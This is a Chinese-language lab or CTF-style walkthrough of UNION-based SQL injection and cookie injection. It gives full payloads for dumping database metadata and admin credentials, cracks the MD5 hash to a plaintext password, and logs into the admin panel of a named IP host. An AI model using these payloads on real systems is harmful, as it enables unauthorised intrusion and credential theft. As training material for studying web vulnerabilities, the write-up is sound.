——————————————————第一题sql注入
第一步,判断是否存在sql注入漏洞在地址栏添加
构造 ?id=1 and 1=1 ,回车
2.页面返回正常
构造 ?id=1 and 1=2 ,回车
第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车
页面正常
构造 ?id=1 and 1=1 order by 2 回车
页面正常
构造 ?id=1 and 1=1 order by 3 回车
页面返回 错误,判断字段数为 2
第三步:判断回显点
构造 ?id=1 and 1=2 union select 1,2 回车
页面出现了 2 ,说明我们可以在数字 2 处显示我们想要的内容
第四步:查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车
查询当前数据库版本
构造 ?id=1 and 1=2 union select 1,version() 回车
查询当前数据库 表名
构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=’admin’ limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=’admin’ limit 1,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=’admin’ limit 2,1 回车
查出 admin 表里 有 id username password 三个字段
查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,password from admin limit 1,1 回车
limit 1,1 没有回显,说明只有一个用户
构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回车
得到管理员账号和密码
————————————第二题cookie注入
我们尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。
我们打开Chrome浏览器,这里用到了ModHeader插件(可点击这里或在附件下载)。
我们点击+号新增一个Request头。
我们添加一个Cookie头,并写值为id=171,并确保已开启(打勾)
我们直接访问
http://120.203.13.111:8001/shownews.asp
返回显示正常,
这证明cookie里的id=171,也能正常传参,被当作sql语句拼接。那我们直接进行注入。
我们输入Cookie值为:
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
继续猜测是否存在admin表(+号代替空格,不然会出错)
发现页面回显了2、3、7、8、9。
没有出现数据库错误,这证明admin表是存在的。且第2、第3、7、8、9字段,可以用来猜测字段名,同时,可以直接回显在页面上。
我们接着尝试猜测最常见的管理表字段名Username和Password,我们在2、3、7、8、9中任选两个,分别填入Username和Password
比如2和3:
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
接着刷新页面,发现页面返回了admin表中,username和password字段的值:admin、b9a2a2b5dffb918c
这应该就是管理员用户名和密码了,但管理员密码看起来有些奇怪。字母+数字的16位组合,很像md5的特征。
打开cmd5.com(解密站点)
将b9a2a2b5dffb918c进行解密。
发现密码的明文是welcome。
这个站貌似是南方的CMS,默认管理员后台是根目录的/admin/。
我们尝试打开后台:
http://120.203.13.111:8001/admin/
出现管理员登录页面,输入用户名admin、密码welcome,填写验证码。